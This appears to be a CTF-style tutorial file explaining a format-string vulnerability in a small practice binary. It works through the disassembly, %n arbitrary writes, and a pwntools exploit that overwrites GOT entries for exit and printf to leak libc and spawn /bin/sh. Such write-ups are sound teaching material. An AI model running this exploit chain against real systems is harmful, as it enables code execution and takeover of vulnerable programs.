We will start by inspecting the assembly of our binary.

Condensed, commented output of objdump -d -M intel printf

00000000004011b6 <main>:
  4011b6:       f3 0f 1e fa             endbr64 
  4011ba:       55                      push   rbp
  4011bb:       48 89 e5                mov    rbp,rsp
# Our stackframe is size 0x100
  4011be:       48 81 ec 00 01 00 00    sub    rsp,0x100
# Prints prompt
  4011c5:       48 8d 3d 38 0e 00 00    lea    rdi,[rip+0xe38]        # 402004 <_IO_stdin_used+0x4>
  4011cc:       e8 bf fe ff ff          call   401090 <puts@plt>
# Read our name into a buffer at [rbp-0x100]
  4011d1:       48 8b 15 78 2e 00 00    mov    rdx,QWORD PTR [rip+0x2e78]        # 404050 <stdin@@GLIBC_2.2.5>
  4011d8:       48 8d 85 00 ff ff ff    lea    rax,[rbp-0x100]
  4011df:       be 00 01 00 00          mov    esi,0x100
  4011e4:       48 89 c7                mov    rdi,rax
  4011e7:       e8 c4 fe ff ff          call   4010b0 <fgets@plt>
  4011ec:       48 8d 3d 23 0e 00 00    lea    rdi,[rip+0xe23]        # 402016 <_IO_stdin_used+0x16>
  4011f3:       e8 98 fe ff ff          call   401090 <puts@plt>
# Call printf(buffer)
  4011f8:       48 8d 85 00 ff ff ff    lea    rax,[rbp-0x100]
  4011ff:       48 89 c7                mov    rdi,rax
  401202:       b8 00 00 00 00          mov    eax,0x0
  401207:       e8 94 fe ff ff          call   4010a0 <printf@plt>
  40120c:       bf 0a 00 00 00          mov    edi,0xa
# Print a newline
  401211:       e8 6a fe ff ff          call   401080 <putchar@plt>
  401216:       bf 00 00 00 00          mov    edi,0x0
# Calls exit
  40121b:       e8 a0 fe ff ff          call   4010c0 <exit@plt>

From the assembly we can see that the general flow of the problem is to ask for input then just call printf(buffer). This is a seemingly innocuous bug, but it can actually lead to instruction pointer control. There is a specific printf format %n that writes to memory.

The expected usage of %n is to recover the length of the string printed by printf. It writes the number of characters printed so far to a pointer.

Consider the following code.

int x;
printf("abc%n\n", &x);
printf("%d\n", x);

// Prints:
// abc
// 3

If we can somehow control the ith argument to printf we can write to an arbitrary location in memory. Inspecting the stackframe layout may give us this control. The stack frame for main will look like:

Note: Zeroes are unreferenced memory, their value may be non-zero at runtime.

rsp (rbp-0x100):  00000000    00000000
rbp-0xf8          00000000    00000000
rbp-0xf0          00000000    00000000
rbp-0xe8          00000000    00000000
rbp-0xe0          00000000    00000000
rbp-0xd8          00000000    00000000
rbp-0xd0          00000000    00000000
rbp-0xc8          00000000    00000000
rbp-0xc0          00000000    00000000
rbp-0xb8          00000000    00000000
rbp-0xb0          00000000    00000000
rbp-0xa8          00000000    00000000
rbp-0xa0          00000000    00000000
rbp-0x98          00000000    00000000
rbp-0x90          00000000    00000000
rbp-0x88          00000000    00000000
rbp-0x80          00000000    00000000
rbp-0x78          00000000    00000000
rbp-0x70          00000000    00000000
rbp-0x68          00000000    00000000
rbp-0x60          00000000    00000000
rbp-0x58          00000000    00000000
rbp-0x50          00000000    00000000
rbp-0x48          00000000    00000000
rbp-0x40          00000000    00000000
rbp-0x38          00000000    00000000
rbp-0x30          00000000    00000000
rbp-0x28          00000000    00000000
rbp-0x20          00000000    00000000
rbp-0x18          00000000    00000000
rbp-0x10          00000000    00000000
rbp-0x8           00000000    00000000
rbp:             [saved rbp] [saved rip]

Recall that the 7th argument to printf will be rsp. Notice that the buffer we control is in the same region that our arguments will come from. If we were to write aaaaaaaa%6$n into our buffer, we'd overwrite the memory address 0x6161616161616161 with 0. The example stackframe would look like:

Note: Zeroes are unreferenced memory, their value may be non-zero at runtime.

rsp (rbp-0x100):  61616161    61616161
rbp-0xf8          6e243625    00000010
rbp-0xf0          00000000    00000000
rbp-0xe8          00000000    00000000
rbp-0xe0          00000000    00000000
rbp-0xd8          00000000    00000000
rbp-0xd0          00000000    00000000
rbp-0xc8          00000000    00000000
rbp-0xc0          00000000    00000000
rbp-0xb8          00000000    00000000
rbp-0xb0          00000000    00000000
rbp-0xa8          00000000    00000000
rbp-0xa0          00000000    00000000
rbp-0x98          00000000    00000000
rbp-0x90          00000000    00000000
rbp-0x88          00000000    00000000
rbp-0x80          00000000    00000000
rbp-0x78          00000000    00000000
rbp-0x70          00000000    00000000
rbp-0x68          00000000    00000000
rbp-0x60          00000000    00000000
rbp-0x58          00000000    00000000
rbp-0x50          00000000    00000000
rbp-0x48          00000000    00000000
rbp-0x40          00000000    00000000
rbp-0x38          00000000    00000000
rbp-0x30          00000000    00000000
rbp-0x28          00000000    00000000
rbp-0x20          00000000    00000000
rbp-0x18          00000000    00000000
rbp-0x10          00000000    00000000
rbp-0x8           00000000    00000000
rbp:             [saved rbp] [saved rip]

We can extend this further to write any value into that memory address by adding an additional format with a length specifier. The format %100x will print an int padded to 100 characters. The format aaaaaaaa%100d%6$n will write the value 100 into memory address 0x61616161616161.

We almost have an arbitrary write, the only issue is that memory addresses that contain 00 bytes will terminate our string. The string aaaa\x00\x00\x00\x00%100d%6$n will only print aaaa and will not overwrite the memory at address 0x0000000061616161. The fix for this is to put our memory address at the end of the printf format. Unfortunately this usually means a lot of tedious calculations. Luckily there are libraries developed exactly for this purpose. I like to use this one Printf Exploit.

Now that we can overwrite an arbitary memory address, we can start our exploit.

The global offset table is a very nice target for our exploit. It'd be really nice if we could leak a libc address, overwrite a GOT entry to system@libc and jump to system. This process requires some creative thinking.

A common technique in binary exploitation is to leak an address, then call main again. To do this we can overwrite the GOT entry for exit to the address of main. This will cause main to infinite loop, then we can leak a pointer. The function main is called by a libc function called __libc_start_main. We can print main's return address and we'll have a libc leak.

Once we have a libc leak, we can compute the address for system@libc and overwrite the GOT entry for printf. Then if we cause the program to call printf("/bin/sh"), we'll actually call system("/bin/sh") and get a shell.

To actually write this exploit we first load our binary and libc with some standard pwntools boilerplate.

from pwn import *
from fmtstr import FormatString

r = process('build/printf')
e = ELF('build/printf')
libc = ELF('/usr/lib/libc.so.6')

# Create a new tmux pane with gdb when using gdb.attach()
context.clear(arch='amd64')
context.terminal = ["tmux", "splitw", "-h"]

We use the format string library to cause main to loop

# Cause main to loop
# Offset is 6 since the first 5 args are registers
fmt = FormatString(offset=6, written=0, bits=64)
fmt[e.got['exit']] = e.symbols['main']
payload, sig = fmt.build()

def dump(x):
    try:
        from hexdump import hexdump
        hexdump(x)
    except ImportError:
        import binascii, textwrap
        print('\n'.join(textwrap.wrap(binascii.hexlify(x), 32)))

dump(payload)

r.sendline(payload)

Then we leak the address that calls main from __libc_start_main. We have to account for the fact that main is recursively calling itself so there's an extra stackframe to jump over. Once we leak this value, we can use pwntools to find which address in libc calls main using libc_start_main_return and compute a difference to find the libc base offset.

# registers - 5 args
# buffer - 256/8 = 32 args
# rbp - 1 arg
# rip - 1 arg
# buffer - 256/8 = 32 args
# rbp - 1 arg
# 5 + 32 + 1 + 1 + 32 + 1 = 72
# We need to skip the first 72 args to find main's ret address
leak_str = b"%73$16p"

r.sendline(leak_str)

r.recvuntil("0x")
x = r.recvline()
leak = int(x.decode('ascii'),16)

libc_offset = leak - libc.libc_start_main_return

Now we overwrite the GOT entry for printf to be system. After this code finishes we should just be able to type /bin/sh into the next iteration of main and we will get a shell.

fmt = FormatString(offset=6, written=0, bits=64)
fmt[e.got['printf']] = libc_offset + libc.symbols['system']
payload, sig = fmt.build()

def dump(x):
    try:
        from hexdump import hexdump
        hexdump(x)
    except ImportError:
        import binascii, textwrap
        print('\n'.join(textwrap.wrap(binascii.hexlify(x), 32)))

dump(payload)

r.sendline(payload)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

pwn-printf-got.md

pwn-printf-got.md

Files

pwn-printf-got.md

Latest commit

History

pwn-printf-got.md

File metadata and controls